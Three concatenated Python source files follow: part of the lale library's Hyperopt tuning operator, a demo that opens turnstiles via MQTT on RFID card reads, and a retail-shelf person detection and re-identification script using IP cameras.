trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trial_info = (
f'pipeline: """{trainable.pretty_print(show_imports=False)}"""'
)
except BaseException:
trial_info = f"hyperparams: {params}"
error_msg = f"Exception caught in Hyperopt: {exception_type}, {traceback.format_exc()}with {trial_info}"
logger.warning(error_msg + ", setting status to FAIL")
return_dict["status"] = hyperopt.STATUS_FAIL
return_dict["error_msg"] = error_msg
if self.verbose:
print(return_dict["error_msg"])
def get_final_trained_estimator(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
trained = trainable.fit(X_train, y_train)
return trained
def f(params):
current_time = time.time()
if (self.max_opt_time is not None) and (
(current_time - opt_start_time) > self.max_opt_time
):
# if max optimization time set, and we have crossed it, exit optimization completely
sys.exit(0)
if self.max_eval_time:
# Run hyperopt in a subprocess that can be interupted
manager = multiprocessing.Manager()
proc_dict = manager.dict()
p = multiprocessing.Process(
target=proc_train_test, args=(params, X_train, y_train, proc_dict)
)
p.start()
p.join(self.max_eval_time)
if p.is_alive():
p.terminate()
p.join()
logger.warning(
f"Maximum alloted evaluation time exceeded. with hyperparams: {params}, setting status to FAIL"
)
proc_dict["status"] = hyperopt.STATUS_FAIL
if "status" not in proc_dict:
logger.warning("Corrupted results, setting status to FAIL")
proc_dict["status"] = hyperopt.STATUS_FAIL
else:
proc_dict = {}
proc_train_test(params, X_train, y_train, proc_dict)
return proc_dict
algo = getattr(hyperopt, self.algo)
# Search in the search space with defaults
if self.evals_with_defaults > 0:
try:
hyperopt.fmin(
f,
self.search_space_with_defaults,
algo=algo.suggest,
max_evals=self.evals_with_defaults,
trials=self._default_trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
raise ValueError(
"Error from hyperopt, none of the trials succeeded."
)
try:
hyperopt.fmin(
f,
self.search_space,
algo=algo.suggest,
max_evals=self.max_evals - self.evals_with_defaults,
trials=self._trials,
rstate=np.random.RandomState(SEED),
show_progressbar=self.show_progressbar,
)
except SystemExit:
logger.warning(
"Maximum alloted optimization time exceeded. Optimization exited prematurely"
)
except AllTrialsFailed:
self._best_estimator = None
if hyperopt.STATUS_OK not in self._trials.statuses():
self._summarize_statuses()
raise ValueError("Error from hyperopt, none of the trials succeeded.")
self._trials = merge_trials(self._trials, self._default_trials)
if self.show_progressbar:
self._summarize_statuses()
try:
best_trial = self._trials.best_trial
val_loss = self._trials.best_trial["result"]["loss"]
if len(self._default_trials) > 0:
default_val_loss = self._default_trials.best_trial["result"]["loss"]
if default_val_loss < val_loss:
best_trial = self._default_trials.best_trial
best_params = best_trial["result"]["params"]
logger.info(
"best score: {:.1%}\nbest hyperparams found using {} hyperopt trials: {}".format(
self.best_score - self._trials.average_best_error(),
self.max_evals,
best_params,
)
)
trained = get_final_trained_estimator(best_params, X_train, y_train)
self._best_estimator = trained
except BaseException as e:
logger.warning(
"Unable to extract the best parameters from optimization, the error: {}".format(
e
)
)
self._best_estimator = None
return self
def predict(self, X_eval):
import warnings
warnings.filterwarnings("ignore")
if self._best_estimator is None:
raise ValueError(
"Can not predict as the best estimator is None. Either an attempt to call `predict` "
"before calling `fit` or all the trials during `fit` failed."
)
trained = self._best_estimator
try:
predictions = trained.predict(X_eval)
except ValueError as e:
logger.warning(
"ValueError in predicting using Hyperopt:{}, the error is:{}".format(
trained, e
)
)
predictions = None
return predictions
def summary(self):
"""Table summarizing the trial results (ID, loss, time, log_loss, status).
Returns
-------
result : DataFrame"""
def make_record(trial_dict):
return {
"name": f'p{trial_dict["tid"]}',
"tid": trial_dict["tid"],
"loss": trial_dict["result"].get("loss", float("nan")),
"time": trial_dict["result"].get("time", float("nan")),
"log_loss": trial_dict["result"].get("log_loss", float("nan")),
"status": trial_dict["result"]["status"],
}
records = [make_record(td) for td in self._trials.trials]
result = pd.DataFrame.from_records(records, index="name")
return result
def get_pipeline(self, pipeline_name=None, astype="lale"):
"""Retrieve one of the trials.
Parameters
----------
pipeline_name : union type, default None
- string
Key for table returned by summary(), return a trainable pipeline.
- None
When not specified, return the best trained pipeline found.
astype : 'lale' or 'sklearn', default 'lale'
Type of resulting pipeline.
Returns
-------
result : Trained operator if best, trainable operator otherwise.
"""
best_name = None
if self._best_estimator is not None:
best_name = f'p{self._trials.best_trial["tid"]}'
if pipeline_name is None:
pipeline_name = best_name
if pipeline_name == best_name:
result = getattr(self, "_best_estimator", None)
else:
tid = int(pipeline_name[1:])
params = self._trials.trials[tid]["result"]["params"]
result = create_instance_from_hyperopt_search_space(self.estimator, params)
if result is None or astype == "lale":
return result
assert astype == "sklearn", astype
return result.export_to_sklearn_pipeline()
_hyperparams_schema = {
"allOf": [
{
"type": "object",
"required": [
"estimator",
"max_evals",
"cv",
"handle_cv_failure",
"max_opt_time",
"pgo",
"show_progressbar",
],
"relevantToOptimizer": ["estimator", "max_evals", "cv"],
"additionalProperties": False,
"properties": {
"estimator": {
"description": "Planned Lale individual operator or pipeline,\nby default LogisticRegression.",
"anyOf": [
{"laleType": "operator", "not": {"enum": [None]}},
{"enum": [None]},
],
"default": None,
},
"algo": {
"description": """Algorithm for searching the space.
Use 'rand' for random search,
'tpe' for tree of parzen estimators,
'atpe' for adaptive TPE,
'anneal' for variant on random search that takes some advantage of a smooth response surface.""",
"enum": ["rand", "tpe", "atpe", "anneal"],
"default": "tpe",
},
"max_evals": {
"description": "Number of trials of Hyperopt search.",
"type": "integer",
"minimum": 1,
"default": 50,
},
"frac_evals_with_defaults": {
"description": """Sometimes, using default values of hyperparameters works quite well.
This value would allow a fraction of the trials to use default values. Hyperopt searches the entire search space
for (1-frac_evals_with_defaults) fraction of max_evals.""",
"type": "number",
"minimum": 0.0,
"default": 0,
},
"cv": {
"description": """Cross-validation as integer or as object that has a split function.
The fit method performs cross validation on the input dataset for per
trial, and uses the mean cross validation performance for optimization.
This behavior is also impacted by handle_cv_failure flag.
If integer: number of folds in sklearn.model_selection.StratifiedKFold.
If object with split function: generator yielding (train, test) splits
as arrays of indices. Can use any of the iterators from
https://scikit-learn.org/stable/modules/cross_validation.html#cross-validation-iterators.""",
"anyOf": [
{"type": "integer"},
{"laleType": "Any", "forOptimizer": False},
],
"minimum": 1,
"default": 5,
},
"handle_cv_failure": {
"description": """How to deal with cross validation failure for a trial.
If True, continue the trial by doing a 80-20 percent train-validation
split of the dataset input to fit and report the score on the
validation part. If False, terminate the trial with FAIL status.""",
"type": "boolean",
"default": False,
},
"scoring": {
"description": """Scorer object, or known scorer named by string.
Default of None translates to `accuracy` for classification and `r2` for regression.""",
"anyOf": [
{
"description": """Custom scorer object created with `make_scorer`_.
The argument to make_scorer can be one of scikit-learn's metrics_,
or it can be a user-written Python function to create a completely
custom scorer objects, following the `model_evaluation`_ example.
The metric has to return a scalar value. Note that scikit-learns's
scorer object always returns values such that higher score is
better. Since Hyperopt solves a minimization problem, we pass
(best_score - score) to Hyperopt.
.. _`make_scorer`: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html#sklearn.metrics.make_scorer.
.. _metrics: https://scikit-learn.org/stable/modules/classes.html#module-sklearn.metrics
.. _`model_evaluation`: https://scikit-learn.org/stable/modules/model_evaluation.html
""",
"not": {"type": "string"},
},
{
"description": "Known scorer for classification task.",
"enum": [
"accuracy",
"explained_variance",
"max_error",
"roc_auc",
"roc_auc_ovr",
"roc_auc_ovo",
"roc_auc_ovr_weighted",
"roc_auc_ovo_weighted",
"balanced_accuracy",
"average_precision",
"neg_log_loss",
"neg_brier_score",
],
},
{
"description": "Known scorer for regression task.",
"enum": [
"r2",
"neg_mean_squared_error",
"neg_mean_absolute_error",
"neg_root_mean_squared_error",
"neg_mean_squared_log_error",
"neg_median_absolute_error",
],
},
],
"default": None,
},
"best_score": {
"description": """The best score for the specified scorer.
This allows us to return a loss to hyperopt that is >=0,
where zero is the best loss.""",
"type": "number",
"default": 0.0,
},
"max_opt_time": {
"description": "Maximum amout of time in seconds for the optimization.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"max_eval_time": {
"description": "Maximum amout of time in seconds for each evaluation.",
"anyOf": [
{"type": "number", "minimum": 0.0},
{"description": "No runtime bound.", "enum": [None]},
],
"default": None,
},
"pgo": {
"anyOf": [{"description": "lale.search.PGO"}, {"enum": [None]}],
"default": None,
},
"show_progressbar": {
"description": "Display progress bar during optimization.",
"type": "boolean",
"default": True,
},
"args_to_scorer": {
"anyOf": [
{"type": "object"}, # Python dictionary
{"enum": [None]},
],
"description": """A dictionary of additional keyword arguments to pass to the scorer.
Used for cases where the scorer has a signature such as ``scorer(estimator, X, y, **kwargs)``.
""",
"default": None,
},
"verbose": {
"description": """Whether to print errors from each of the trials if any.
This is also logged using logger.warning.""",
"type": "boolean",
"default": False,
},
},
}
]
}
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"properties": {"X": {}, "y": {}},
}
_input_predict_schema = {"type": "object", "required": ["X"], "properties": {"X": {}}}
_output_predict_schema: Dict[str, Any] = {}
_combined_schemas = {
"description": """Hyperopt_ is a popular open-source Bayesian optimizer.
.. _Hyperopt: https://github.com/hyperopt/hyperopt
Examples
--------
>>> from lale.lib.sklearn import LogisticRegression as LR
>>> clf = Hyperopt(estimator=LR, cv=3, max_evals=5)
>>> from sklearn import datasets
>>> diabetes = datasets.load_diabetes()
>>> X = diabetes.data[:150]
>>> y = diabetes.target[:150]
>>> trained = clf.fit(X, y)
>>> predictions = trained.predict(X)
Other scoring metrics:
>>> from sklearn.metrics import make_scorer, f1_score
>>> clf = Hyperopt(estimator=LR,
... scoring=make_scorer(f1_score, average='macro'), cv=3, max_evals=5)
""",
"documentation_url": "https://lale.readthedocs.io/en/latest/modules/lale.lib.lale.hyperopt.html",
"import_from": "lale.lib.lale",
"type": "object",
"tags": {"pre": [], "op": ["estimator"], "post": []},
"properties": {
"hyperparams": _hyperparams_schema,
"input_fit": _input_fit_schema,
"input_predict": _input_predict_schema,
"output_predict": _output_predict_schema,
},
}
Hyperopt = lale.operators.make_operator(_HyperoptImpl, _combined_schemas)
lale.docstrings.set_docstrings(Hyperopt)
|
turnstile_demo.py
|
#!/usr/bin/python
try:
import mosquitto
except ImportError:
import paho.mqtt.client as mosquitto
import logging
import time
import serial
import threading
import re
logging.getLogger('').setLevel(logging.DEBUG)
class WbMqttHandler(object):
def _on_mqtt_message(self, mosq, obj, msg):
logging.debug("got mqtt message on topic %s" % msg.topic)
if not mosquitto.topic_matches_sub('/devices/+/controls/#', msg.topic):
return
parts = msg.topic.split('/')
device_id = parts[2].decode('utf8')
control_id = parts[4].decode('utf8')
channel = (device_id, control_id)
# ignore retained values
if msg.retain:
return
logging.debug("%s/%s <= %s" % (channel[0], channel[1], msg.payload))
self.on_channel_value(self._format_channel(channel), msg.payload)
def _parse_channel(self, channel_str):
channel = channel_str.split('/', 1)
if len(channel) != 2:
raise RuntimeError("wrong channel spec %s" % channel_str)
return tuple(channel)
def _format_channel(self, channel):
assert len(channel) == 2
return "%s/%s" % channel
def on_channel_value(self, channel, value):
""" to be redefined in user classes """
logging.info("%s/%s <= %s" % (channel[0], channel[1], value))
def set_channel_value(self, channel_str, value):
channel = self._parse_channel(channel_str)
topic = "/devices/%s/controls/%s/on" % channel
self.client.publish(topic, str(value), qos=2, retain=False)
def __init__(self, subscribe_channels = []):
self.client = mosquitto.Mosquitto()
self.client.connect("127.0.0.1", 1883)
self.client.on_message = self._on_mqtt_message
self.client.loop_start()
for channel_str in subscribe_channels:
channel = self._parse_channel(channel_str)
self.client.subscribe("/devices/%s/controls/%s" % channel)
print "/devices/%s/controls/%s" % channel
class Matrix3NetworkHandler(object):
""" handles a network of Matrix III RD-ALL readers
connected to a single RS-485 bus.
The readers must be prepared by flasing the special firmware first:
http://www.ironlogic.ru/il.nsf/file/ru_rdall_net.rar/$FILE/rdall_net.rar
"""
def __init__(self, port, timeout=1):
self.port = serial.Serial(port = port,
baudrate=9600, parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
timeout=timeout)
self.reader_thread = threading.Thread(target=self.reader_loop)
self.reader_thread.daemon = True
self.reader_thread.start()
self.card_pattern = re.compile(r'^([^[]+)\[([0-9A-F]+)\] ([^ ]*) ?(?:\(([^,]+),([^,]+)\))? ?(\d{3}),(\d{5})$')
def parse_reply(self, line):
""" Processes the message sent by Matrix III reader in
network mode. Returns None if the reply cannot by parsed,
and tuple of (reader_id, message) otherwise """
# format:
# UUUUU <everything else>
# UUUUU is a reader id
match = re.match("^(\d{5}) (.*)$", line)
if not match:
return None
reader_id = int(match.group(1))
message = match.group(2)
return reader_id, message
def parse_card_message(self, msg):
""" Parses the reader answer about the card in field, if any.
Returns None if no card present,
a tuple (card_type, card_number) otherwise
"""
# Examples of card messages:
# No Card
# Mifare[3AAC2280045646] (0142,20) 004,22086
# Mifare[3AAC228004724B] (0142,20) 004,29259
# Mifare[A24B3180044807] (0144,10) 004,18439
# Mifare[77242CF0] (0004,88) 044,09335
# Mifare[FA592F830412E6] UL (0144,00) 004,04838
# Mifare[F2D329830409B6] UL (0144,00) 004,02486
# Mifare[2A223182048F18] UL (0144,00) 004,36632
# Mifare[F274238004DEC2] UL (0144,00) 004,57026
# Mifare[81895266340051] UL (0144,00) 052,00081
# Mifare[BCD14264] 1K (0004,08) 066,53692
# Mifare[24548AAC] 1K (0004,08) 138,21540
# Mifare[9DCB4340] 1K (0004,08) 067,52125
# Mifare[124A2D80042C27] DF (0144,20) 004,11303
# Em-Marine[5500] 126,58404
if msg == 'No Card':
return None
logging.debug("got card message: '%s'" % msg)
match = re.match(self.card_pattern, msg)
if not match:
logging.warning("unknown card message: %s" % msg)
return None
card_type = match.group(1)
card_subtype = match.group(3)
serial_1 = match.group(2)
serial_2 = match.group(6)
serial_3 = match.group(7)
serial_23_hex = hex(int(serial_2)*0xFF + int(serial_3))[2:].upper()
if card_type == 'Mifare':
# serial_2 and serial_3 are 3 last bytes of the serial_1, ignoring
serial = serial_1
else:
serial = serial_1 + serial_23_hex
return (card_type + card_subtype, serial)
def process_async_message(self, msg):
""" Processes the message sent by Matrix III reader
for a new card detected in field """
# example reader message:
# 19997 Mifare[62D22F80041B4B] (0144,08) 004,06987
reply = self.parse_reply(msg)
if reply:
reader_id, card_message = reply
card_info = self.parse_card_message(card_message)
if card_info:
card_type, card_serial = card_info
logging.debug("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
self.on_new_card(reader_id, card_type, card_serial)
def reader_loop(self):
while True:
line = self.port.readline()
if line:
self.process_async_message(line[:-2])
def on_new_card(self, reader_id, card_type, card_serial):
""" to be ovverriden by user """
logging.info("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
class TurnstilesManager(object):
def on_pass_signal(self, channel, value):
if value != '1':
return
for turnstile in self.turnstiles:
if channel == turnstile['pass_status_channel']:
logging.info("Pass signal detected for turnstile %s" % turnstile['name'])
break
def on_new_card(self, reader_id, card_type, card_serial):
logging.info("Reader %s: new card %s[%s] in field" % (reader_id, card_serial, card_type))
for turnstile in self.turnstiles:
if reader_id == turnstile['reader_id']:
allow_open = int(card_serial, 16) % 2 == 0
if allow_open:
logging.info("Turnstile %s: opening the gate" % turnstile['name'])
self.mqtt_handler.set_channel_value(turnstile['open_channel'], '1')
time.sleep(100E-3)
self.mqtt_handler.set_channel_value(turnstile['open_channel'], '0')
else:
logging.info("Turnstile %s: access denied!" % turnstile['name'])
break
else:
logging.error("unknown reader id: %s" % reader_id)
def __init__(self, turnstiles):
self.turnstiles = turnstiles
status_channels = [turnstile['pass_status_channel'] for turnstile in self.turnstiles]
self.mqtt_handler = WbMqttHandler(subscribe_channels = status_channels)
self.readers_handler = Matrix3NetworkHandler(port='/dev/ttyAPP4')
self.mqtt_handler.on_channel_value = self.on_pass_signal
self.readers_handler.on_new_card = self.on_new_card
if __name__ =='__main__':
manager = TurnstilesManager(turnstiles = [
{
'name' : 'Turnstile 1 forward',
'reader_id' : 3794,
'pass_status_channel' : 'wb-gpio/A1_IN',
'open_channel' : 'wb-gpio/EXT1_R3A1'
},
{
'name' : 'Turnstile 1 backwards',
'reader_id' : 12609,
'pass_status_channel' : 'wb-gpio/A2_IN',
'open_channel' : 'wb-gpio/EXT1_R3A2'
},
])
# mqtt_handler = WbMqttHandler(subscribe_channels = [ "wb-gpio/A1_IN", "wb-gpio/A2_IN" ])
# readers_handler = Matrix3NetworkHandler(port='/dev/ttyAPP4')
time.sleep(1E100)
|
main_multi_processing2_zc.py
|
#encoding: utf-8
from multiprocessing import Pool, Process
from multiprocessing.managers import BaseManager
import os, time, random
import HKIPcamera
import cv2
import copy
import math
from loadconfig import *
import rospy
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge, CvBridgeError
from utils import *
from darknet import Darknet
import os.path as osp
from reid.utils.serialization import load_checkpoint
from reid import models
from reid.feature_extraction import extract_cnn_feature
import time
import publish_msg.publish_msg as pubmsg
import pickle
import torchvision.transforms as T
class HKCamera(object):
def __init__(self, ip, name, pw):
self._ip = ip
self._name = name
self._pw = pw
HKIPcamera.init(self._ip, self._name, self._pw)
def getFrame(self):
frame = HKIPcamera.getframe()
return frame
def compare_dic(dic1, dic2):
for i in (dic1):
for j in (dic2):
if i == j and dic1[i] != dic2[j]:
return True
return False
def exist_people(dic1):
for i in (dic1):
if dic1[i] == 1:
return True
return False
def diff_dic(dic2, dic1):
diff = []
for i in (dic1):
for j in (dic2):
if i == j and dic1[i] != dic2[j]:
diff.append(i)
if not dic2.has_key(i):
diff.append(i)
return diff
def pairwise_distance(fea1, fea2):
fea1 = torch.squeeze(fea1, 0)
fea1 = torch.squeeze(fea1, -1)
fea2 = torch.squeeze(fea2, 0)
fea2 = torch.squeeze(fea2, -1)
x = fea1
y = fea2
m1, n = 1, 1
x = x.view(m1, -1)
y = y.view(n, -1)
dist = torch.pow(x, 2).sum(1).unsqueeze(1).expand(m1, n) + \
torch.pow(y, 2).sum(1).unsqueeze(1).expand(n, m1).t()
dist.addmm_(1, -2, x, y.t())
return torch.sum(dist)
def jieduan(img, left, top, right, bottom):
imgg = np.zeros((bottom - top, right - left, 3))
imgg = img[top:bottom, left:right, :]
return imgg
def calcIOU(p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by):
zh = c_x
c_x = c_bx # 960 - c_x
c_bx = zh # 960 - c_bx
condition1 = p_x >= c_x and p_x <= c_bx
condition2 = p_bx >= c_x and p_bx <= c_bx
condition3 = p_y >= c_y and p_y <= c_by
condition4 = p_by >= c_y and p_by <= c_by
# print p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by
if (condition1 and condition3) or (condition1 and condition4) or \
(condition2 and condition3) or (condition2 and condition4):
calcIOU = 1
else:
calcIOU = -1
return calcIOU
def newcalcIOU(two_x, two_y, two_w, two_h, one_x, one_y, one_w, one_h):
zh = one_x
one_x = one_w # 960-one_x
one_w = zh # 960-one_w
S_rec1 = (one_w - one_x) * (one_h - one_y)
S_rec2 = (two_w - two_x) * (two_h - two_y)
sum_area = S_rec1 + S_rec2
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
# judge if there is an intersect
if left_line >= right_line or top_line >= bottom_line:
return -1
else:
intersect = (right_line - left_line) * (bottom_line - top_line)
# print intersect, S_rec2
iou = float(intersect) / S_rec2
return iou
def coordinate_IOU(two_x, two_y, two_w, two_h, one_x, one_y, one_w, one_h): # compute the coordinate of the IOU area
zh = one_x
one_x = one_w # 960-one_x
one_w = zh # 960-one_w
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
return left_line, top_line, right_line, bottom_line
def distanceCal(p_y, s_y):
# return math.sqrt(pow(abs(p_x - s_x), 2) + pow(abs(p_y - s_y), 2))
return abs(p_y - s_y)
# person detection and reid
def preprocess(img):
img = cv2.resize(img, (128, 256))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # img[:,:,::-1]
img = test_transformer(img)
img = torch.unsqueeze(img, 0)
return img
global save_box_no
save_box_no = 0
def reid_draw(frame, b_b, model, cfg, huojia1_id, pre_res,change_idnum):
global size
global save_box_no
id_name = 0
cfg.cuda()
left = int((b_b[0] - b_b[2] / 2.0) * size[0])
top = int((b_b[1] - b_b[3] / 2.0) * size[1])
right = int((b_b[0] + b_b[2] / 2.0) * size[0])
bottom = int((b_b[1] + b_b[3] / 2.0) * size[1])
if left < 0 or right < 0 or top < 0 or bottom < 0:
return left, top, right, bottom, 999
# if bottom > 530:
# ratio = float(bottom - top) / (right - left)
# #print("ratio is: {}".format(ratio))
# if ratio < 1.5:
# #print("ratio is: {}".format(ratio))
# print('filtered out')
# return left, top, right, bottom, 999
frame_reid = copy.deepcopy(frame)
# draw shangpin area
left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
cv2.rectangle(frame, (left_x, top_y), (right_m, bottom_n), (0, 255, 0), 2)
ratio = float(bottom - top) / (right - left)
# # print(ratio)
# if ratio < 2.0:
# # print('filtered out')
# return left, top, right, bottom, 999
img1 = jieduan(frame_reid, left, top, right, bottom)
img = preprocess(img1)
feature = extract_cnn_feature(model, img.cuda())
minsim = -1
try:
pkl_file = open('/data/reid/renti/data.pkl', 'rb')
shujuku = pickle.load(pkl_file)
pkl_file.close()
except:
pkl_file = open('/data/reid/renti/data_bu.pkl', 'rb')
shujuku = pickle.load(pkl_file)
pkl_file.close()
rentidir = '/home/tujh/renti/'
# pkl_file = open('/data/reid/renti/data.pkl', 'rb')
# shujuku = pickle.load(pkl_file)
# pre_item_huoid={}
# for id_name, pre_item in pre_res.items():
# if huojia1_id == pre_item[-1]:
# pre_item_huoid[id_name]=pre_item ##person id in front of huojia_id
if change_idnum:#len(pre_res) == len(shujuku) and #pre_item_huoid:
id_name = reid_draw_multi(pre_res, b_b)
pre_fix='B:'
else:
# for feature2,filename in shujuku:
for query in shujuku:
for fea in shujuku[query]:
distan = pairwise_distance(feature, fea)
if minsim > distan or minsim == -1:
minsim = distan
id_name = int(query)
pre_fix = 'R:'
cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)
cv2.putText(frame, pre_fix+str(id_name), (left, top), cv2.FONT_HERSHEY_COMPLEX, 6, (255, 0, 0), 2)
cv2.imwrite('/home/zhaocy/yhr/tmp_imgs/' + str(save_box_no) + '_' + str(id_name) + '.jpg', img1)
save_box_no += 1
return left, top, right, bottom, id_name
def reid_draw_multi(pre_res, result):
dic_res = {}
if len(pre_res) != 0:
pre_item_center = [abs(result[0] - pre_item[0]) for id_name, pre_item in pre_res.items()]
dist_res = min(pre_item_center)
index_min_dist = pre_item_center.index(dist_res)
id_name_res = list(pre_res.keys())
id_name = id_name_res[index_min_dist]
left, top, right, bottom,_ = pre_res[id_name]
# dic_res[id_name] = [left, top, right, bottom]
return id_name
normalizer = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
test_transformer = T.Compose([T.ToTensor(),
normalizer,
])
# the area of shangpin
# shelf1,2,3,5,6,7
def shangpin_area(shelfid):
if shelfid == 1:
left_x, top_y, right_m, bottom_n = 741, 18, 596, 253
elif shelfid == 10:
left_x, top_y, right_m, bottom_n = 568, 9, 389, 252
elif shelfid == 4:
left_x, top_y, right_m, bottom_n = 870, 10, 190, 370
elif shelfid == 2:
left_x, top_y, right_m, bottom_n = 680, 27, 169, 332
elif shelfid == 6:
left_x, top_y, right_m, bottom_n = 353, 39, 200, 273
elif shelfid == 7:
left_x, top_y, right_m, bottom_n = 712, 3, 310, 344
else:
left_x, top_y, right_m, bottom_n = 0, 0, 0, 0
return left_x, top_y, right_m, bottom_n
# initial the flag of all the people we detected
def initial_flag(left, top, right, bottom, shelfid):
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print("Shelf {}: Filter in IOU = {:4f}".format(shelfid, calcIOU1))
distance = distanceCal(bottom_n, bottom)
#print("shelf {}: distance = {}".format(shelfid, distance))
if calcIOU1 > 0.5 and distance < 100:
flag = 1
else:
flag = 0
return flag
def initial_flag_out(left, top, right, bottom, shelfid):
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
calcIOU1 = newcalcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
#print("Shelf {}: Filter out IOU = {}".format(shelfid, calcIOU1))
distance = distanceCal(bottom_n, bottom)
#print("shelf {}: distance = {}".format(shelfid, distance))
#if calcIOU1 > 0.2 or distance < 130:
if calcIOU1 > 0.1:# and distance < 130:
flag = 1
else:
flag = 0
return flag
def xuanze_original(res, frame, model, cfg, camera_id, dic_change, huojia1_id,pre_res):
dic = {}
change_idnum = len(res) == len(pre_res.keys())
if len(res) == 1:
result = res[0]
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
None
else:
if dic_change.has_key(id_name):
if dic_change[id_name] == 1:
flag = initial_flag_out(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
dic[id_name] = flag
elif len(res) > 1:
for item in res:
result = item
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
None
else:
if dic_change.has_key(id_name):
if dic_change[id_name] == 1:
flag = initial_flag_out(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
else:
flag = initial_flag(left, top, right, bottom, huojia1_id)
dic[id_name] = flag
return dic
def people_list(res, shelfid):
peolist = []
left_x, top_y, right_m, bottom_n = shangpin_area(shelfid)
for b_b in res:
global size
left = int((b_b[0] - b_b[2] / 2.0) * size[0])
top = int((b_b[1] - b_b[3] / 2.0) * size[1])
right = int((b_b[0] + b_b[2] / 2.0) * size[0])
bottom = int((b_b[1] + b_b[3] / 2.0) * size[1])
if calcIOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n) > 0:
x1, x2, x3, x4 = coordinate_IOU(left, top, right, bottom, left_x, top_y, right_m, bottom_n)
peolist.append(x1)
peolist.append(x2)
peolist.append(x3)
peolist.append(x4)
return peolist
global in_out_moments_count
in_out_moments_count = 0
# choose the one which is next to the area of shangpin
def xuanze(res, frame, model, cfg, threadPubMsg_dict, camera_id, dic, change_dic,
huojia1_id, frame_trans,pre_res):
global in_out_moments_count
change_idnum=len(res)==len(pre_res.keys())
for item in res:
result = item
# add new person
if (len(result) > 0):
left, top, right, bottom, id_name = reid_draw(frame, result, model, cfg, huojia1_id,pre_res,change_idnum)
if id_name == 999:
None
else:
in_out_people = diff_dic(dic, change_dic)
if id_name in in_out_people:
left_x, top_y, right_m, bottom_n = shangpin_area(huojia1_id)
customer_name = "name" + str(id_name)
assert type(id_name) is int # must be number
# print("set customer message")
threadPubMsg = threadPubMsg_dict['shelfID_' + str(huojia1_id)]
if change_dic[id_name] == 1:
time.sleep(1) # time delay x seconds
flag = 1
flag1 = 0
flag2 = 1
print(
"t = {}, flag = {}, flag1 = {}, flag2 = {}, id_name = {}, shelfID = {}".format(time.time(),
flag, flag1,
flag2,
id_name,
huojia1_id))
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id,
person_id=id_name,
shelf_id=huojia1_id, flag=flag,
flag1=flag1,
flag2=flag2,
flag_list=people_list(res, huojia1_id),
frame=frame_trans)
cv2.imwrite('/home/shiw/yhr/in_out_moments/' + str(in_out_moments_count) + '.jpg', frame)
in_out_moments_count += 1
print("huojia1: {}".format(huojia1_id))
else:
flag = 0
flag1 = 1
flag2 = 0
print(
"t = {}, flag = {}, flag1 = {}, flag2 = {}, id_name = {}, shelfID = {}".format(time.time(),
flag, flag1,
flag2,
id_name,
huojia1_id))
threadPubMsg.set_commodity_recognition_trigger_with_image(camera_id=camera_id,
person_id=id_name,
shelf_id=huojia1_id, flag=flag,
flag1=flag1,
flag2=flag2,
flag_list=people_list(res, huojia1_id),
frame=None)
cv2.imwrite('/home/shiw/yhr/in_out_moments/' + str(in_out_moments_count) + '.jpg', frame)
in_out_moments_count += 1
print("huojia1: {}".format(huojia1_id))
threadPubMsg.set_customer(name=customer_name, person_id=id_name, camera_id=camera_id, x=left, y=top,
w=right, h=bottom)
return dic
def loadDataset():
torch.cuda.set_device(0)
logs_dir = 'market-1501-Exper33/RPP/'
num_features = 256
num_classes = 751
T = 1
dim = 256
dropout = 0.5
model = models.create('resnet50_rpp', num_features=num_features, dropout=dropout, num_classes=num_classes,
cut_at_pooling=False, FCN=True, T=T, dim=dim)
model = model.cuda()
checkpoint = load_checkpoint(osp.join(logs_dir, 'cvs_checkpoint_0107.pth.tar'))
model.load_state_dict(checkpoint['state_dict'])
res = []
frame_number = 0
# --datasets
shujuku = {}
rentidir = '/data/reid/renti/queries'
return model
def callback(param_tuple): # param_tuple
cfg = param_tuple[1]
model = param_tuple[2]
dict_res = {}
frame_number_list = param_tuple[3]
bridge = param_tuple[4]
camera_id = param_tuple[5]
flag = param_tuple[6]
frame = param_tuple[7]
huojia1_id = param_tuple[8]
pre_res = param_tuple[9]
shape = frame.shape
global size
size = (shape[1], shape[0])
# global frame_number
frame_number_list[0] = frame_number_list[0] + 1
frame_number = frame_number_list[0]
wh_ratio = frame.shape[1] / frame.shape[0]
if type(frame) != np.ndarray:
return True
